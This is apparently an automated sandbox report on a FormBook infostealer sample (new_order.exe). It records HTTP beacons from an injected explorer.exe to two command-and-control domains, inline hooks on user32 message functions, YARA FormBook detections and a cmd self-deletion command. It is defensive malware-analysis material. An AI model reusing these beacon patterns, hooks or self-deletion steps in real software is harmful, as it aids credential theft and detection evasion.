                        Jan 28, 2022 10:35:53.404603004 CET8.8.8.8192.168.2.40xf305No error (0)mydemosite0.com67.225.236.76A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.royalfountainlogistics.com
                        • www.bitherders.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44980634.102.136.18080C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Jan 28, 2022 10:35:12.114126921 CET10406OUTGET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1
                        Host: www.royalfountainlogistics.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Jan 28, 2022 10:35:12.228646040 CET10407INHTTP/1.1 403 Forbidden
                        Server: openresty
                        Date: Fri, 28 Jan 2022 09:35:12 GMT
                        Content-Type: text/html
                        Content-Length: 275
                        ETag: "61f22041-113"
                        Via: 1.1 google
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.4498293.64.163.5080C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Jan 28, 2022 10:35:33.102852106 CET10459OUTGET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1
                        Host: www.bitherders.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Jan 28, 2022 10:35:33.121994019 CET10460INHTTP/1.1 410 Gone
                        Server: openresty
                        Date: Fri, 28 Jan 2022 09:35:37 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 74 68 65 72 64 65 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 74 68 65 72 64 65 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.bitherders.com/' />a </head>9 <body>3a You are being redirected to http://www.bitherders.coma </body>8</html>0


                        Code Manipulations

                        User Modules

                        Hook Summary

                        Function NameHook TypeActive in Processes
                        PeekMessageAINLINEexplorer.exe
                        PeekMessageWINLINEexplorer.exe
                        GetMessageWINLINEexplorer.exe
                        GetMessageAINLINEexplorer.exe

                        Processes

                        Process: explorer.exe, Module: user32.dll
                        Function NameHook TypeNew Data
                        PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0
                        PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                        GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                        GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:10:33:47
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\new_order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\new_order.exe"
                        Imagebase:0x400000
                        File size:253458 bytes
                        MD5 hash:A0E70D1760E60D81E0F4AC2904FA8002
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:3
                        Start time:10:33:50
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\new_order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\new_order.exe"
                        Imagebase:0x400000
                        File size:253458 bytes
                        MD5 hash:A0E70D1760E60D81E0F4AC2904FA8002
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:5
                        Start time:10:33:55
                        Start date:28/01/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:9
                        Start time:10:34:18
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\explorer.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\explorer.exe
                        Imagebase:0x1160000
                        File size:3611360 bytes
                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:10
                        Start time:10:34:25
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\Desktop\new_order.exe"
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:11
                        Start time:10:34:27
                        Start date:28/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff724c50000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        No disassembly